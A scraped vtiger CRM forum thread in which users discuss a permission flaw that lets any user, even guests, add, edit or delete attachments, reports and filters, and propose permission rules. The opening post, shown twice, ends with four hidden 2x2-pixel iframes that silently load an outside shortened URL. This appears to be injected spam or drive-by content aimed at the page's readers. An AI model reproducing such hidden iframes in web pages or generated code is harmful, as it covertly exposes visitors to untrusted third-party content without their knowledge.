Howdy, Stranger!
It looks like you're new here. If you want to get involved, click one of these buttons!
Categories
- 17.5K All Categories
- 39 Vtiger CRM 8.1.0
- 60 Vtiger CRM 8.0.0
- 128 Vtiger CRM 7.5.0
- 7.9K Vtiger CRM 7.4.0
- 308 Vtiger CRM 7.3.0
- 695 Vtiger CRM 7.2.0
- 1.7K Vtiger CRM 7.1.0
- 1.3K Vtiger CRM 7.0.0
- 2.2K Vtiger 6.x
- 1.7K Vtiger CRM 6.5.0
- 1.5K Vtiger CRM 6.4.0
- 304 Vtiger CRM 6.3.0
- 1.7K Vtiger CRM 6.2.0
- 1.4K Vtiger CRM 6.1.0
- 3.1K vtiger CRM 6.0.0
- 638 Help - 6.0
- 171 Feature Requests - 6.0
- 231 Extensions - 6.0
- 411 Usability - 6.0
- 1.3K vtiger CRM - Mobile Apps
- 232 Help
- 35.7K Archives
- 1.6K vtiger CRM 5.4.0
- 1.4K vtiger CRM 5.3.0
- 5.8K vtiger CRM 5.1.0
- 3.8K vtiger CRM 5.0.4
- 2.3K vtiger CRM 5.0.3
- 9.4K vtiger CRM 5.0.2
- 5.3K vtiger CRM 4.x
- 2.5K vtiger CRM - Extensions
- 4.6K Announcements & Discussions
- 28 Test Forum
- 252 Blogs
Seriuous security feature- attachment, reports, filters
Attachments
Anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.
Reports
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.
Filters
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.
I hope someone will tell me that there's already an easy way to avoid these problems without doing a feature request <!-- s
--><img src="{SMILIES_PATH}/icon_wink.gif" alt="" title="Wink" /><!-- s -->
Thank you <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.
Reports
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.
Filters
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.
I hope someone will tell me that there's already an easy way to avoid these problems without doing a feature request <!-- s
--><img src="{SMILIES_PATH}/icon_wink.gif" alt="" title="Wink" /><!-- s -->Thank you <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
yes, we're running the 5.0.3 versione.
but i've also tested all on en.vtiger.com and it 'works' the same way.
as we cann't set permission for attachment, all crm-users has permission to do file attachement. however we can disable the delete permission for file attachement, if the user has only the view permission for particular record.
if the user does not have permission for particular module, he cann't create/edit/view/delete reports for that module. for eg. if potentials module is not permitted for the user smith, smith can not create/edit/view/delete potentials related reports. but the following functionalties need to be implemented.
1) if only view permission given for particular module say potentials, create/edit/delete permission for potentials-reports should be disabled. 2) if create/edit and view permission given, delete permission should be disabled. 3) if delete and view permission given, create permission should be disabled[/list:u]
as the customview-filter is not specific to any module/user, it can be edited/deleted by any crm-user. however we can provide an option for do not edit/delete. if an user create a customview filter and enable this option, this filter can not be deleted/edited by other users.
this is my opinion. kindly give yours.
thanks & regards,
minnie.
if enyone can add an attachment is a minor problem.
the problem is that now vtiger doesn't work as you said. if a user has only the view permission on a specific module he can still delete any attachment about that module. please try it.
i agree with you on these rules <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->
but there is a problem now: if a user has only the view permission on a module, he can edit the report, please try it.
*now* any user, without regard on which kind of permission has, can edit/delete or add any filter, even the default ones that come with the installation.
i believe that only the administrator or a specific profile should be able to add/edit/delete filters.
when a user create e filter it is visible to anyone.
let's imagine what kind of confusion if any user really will start to do so: suddenly the combo filters will have a lot of filters.
it would be advisable to add an option like that:
1) add/edit/delete filters is bound to specific profile
2) the filter should have an option public/private or, better, to relate the view to groups/roles, so every users/groups has only the filter about own interest in the combo filter.
3) it should be possible to define the order of filters visualization, because now they are ordered in the combo filter in the same order in which you add them.
thank you
we have 65 potential users, it's going to be a mess showing all filters all the time.
there is ticket:
<!-- m --><a class="postlink" href="http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083">http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/4083</a><!-- m -->
regards,
ln
i'd like to at least keep the filters private for the moment, expand into the permissions system later.
because if only/mainly one, so will be better think about, how setup diferent filters for diferent users/groups as default in first step....
regards,
ln